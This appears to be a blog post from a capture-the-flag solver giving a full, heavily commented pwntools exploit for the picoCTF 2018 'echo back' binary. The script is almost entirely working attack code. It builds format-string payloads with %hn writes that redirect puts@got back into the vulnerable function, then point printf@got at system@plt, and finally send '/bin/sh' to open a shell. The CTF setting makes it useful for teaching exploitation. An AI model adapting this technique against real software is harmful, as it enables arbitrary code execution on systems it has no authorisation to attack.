pico CTF 2018 echo back
JeonYoungSin
2019. 8. 12. 20:58
exploit.py
from pwn import *
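# Exploit for picoCTF 2018 "echo back": a format-string bug turned into two
# GOT overwrites.  The binary is 32-bit and non-PIE (every target below lives
# under 0x0804xxxx), so nothing has to be leaked first; all addresses are static.
#
# Three lines are sent to the vulnerable echo function:
#   1. puts@got   <- the vulnerable function, so the next puts() call jumps
#                    back into it and we get a second format string.
#   2. printf@got <- system@plt, so the following printf(buf) is system(buf).
#   3. "/bin/sh"  as the buffer that printf/system now receives.
# Step 1 must come before step 2: once printf@got points at system, the
# format string is no longer interpreted, so no further writes are possible.
#
# Each 32-bit value is written as two 16-bit halves with %hn; two short writes
# keep the number of padding bytes printf has to emit (and so the run time)
# small compared with a single %n.

VULN_ADDR = 0x080485ab   # the read-then-printf function (low half 0x85ab in the
                         # original script); could be e.symbols[...] if the
                         # binary is not stripped -- TODO confirm
SYSTEM_PLT = 0x08048460  # system@plt stub, new target of printf@got; likely
                         # equals e.plt['system'] -- TODO confirm

# Positional printf arguments at which the start of our own buffer is found
# on the stack (7 and 8 in the original script; specific to this binary --
# re-check with %7$x / %8$x if the exploit is reused).
LO_IDX = 7
HI_IDX = 8


def fmt_split_write(value, lo_idx, hi_idx, written=8):
    """Return the "%Nx%i$hn%Mx%j$hn" tail that writes *value* as two halves.

    The caller puts two pointers at the front of the buffer: `target`
    (dereferenced by `%<lo_idx>$hn`) and `target + 2` (by `%<hi_idx>$hn`).
    Those pointers are the `written` bytes printf has already emitted when
    the first padding starts, so they are subtracted from the first pad.

    Args:
        value:   32-bit value to store at the target (only low 32 bits used).
        lo_idx:  positional index of the pointer to the low 16-bit half.
        hi_idx:  positional index of the pointer to the high 16-bit half.
        written: bytes already printed before the first `%Nx` (the pointers).

    Returns:
        A str such as "%34211x%7$hn%33369x%8$hn".  `%hn` stores the running
        byte count modulo 0x10000, so the second pad only has to move the
        count to the high half modulo 0x10000 -- it never needs to "go back".
    """
    lo = value & 0xffff
    hi = (value >> 16) & 0xffff
    # A pad of exactly 0 is replaced by a full 0x10000 wrap: "%0x" would still
    # print at least one character and put the count off by one.
    pad_lo = (lo - written) % 0x10000 or 0x10000
    pad_hi = (hi - lo) % 0x10000 or 0x10000
    return "%{}x%{}$hn%{}x%{}$hn".format(pad_lo, lo_idx, pad_hi, hi_idx)


def got_write(target, value):
    """Build one complete echo-back line that stores *value* at *target*.

    Layout: p32(target) p32(target+2) <padding/%hn tail>.  The pointers are
    written first so that their length is what `written` accounts for.
    """
    pointers = p32(target) + p32(target + 2)
    tail = fmt_split_write(value, LO_IDX, HI_IDX, written=len(pointers))
    # .encode() keeps the concatenation valid on both Python 2 (p32 -> str)
    # and Python 3 (p32 -> bytes); the original script was Python 2 only.
    return pointers + tail.encode()


def main():
    """Run the three-step GOT overwrite and hand the shell to the user."""
    p = process('./echoback')
    e = ELF('./echoback')
    puts_got = e.got['puts']
    printf_got = e.got['printf']

    # 1) puts@got -> vulnerable function.  The first prompt is matched on a
    #    bare newline, as in the original.
    p.sendlineafter('\n', got_write(puts_got, VULN_ADDR))
    # 2) printf@got -> system@plt, sent through the re-entered function.
    p.sendlineafter("message:\n", got_write(printf_got, SYSTEM_PLT))
    # 3) printf("/bin/sh") is now system("/bin/sh").  NUL-terminated so the
    #    command string ends exactly there.
    p.sendlineafter("message:\n", b"/bin/sh\x00")
    p.interactive()


if __name__ == "__main__":
    main()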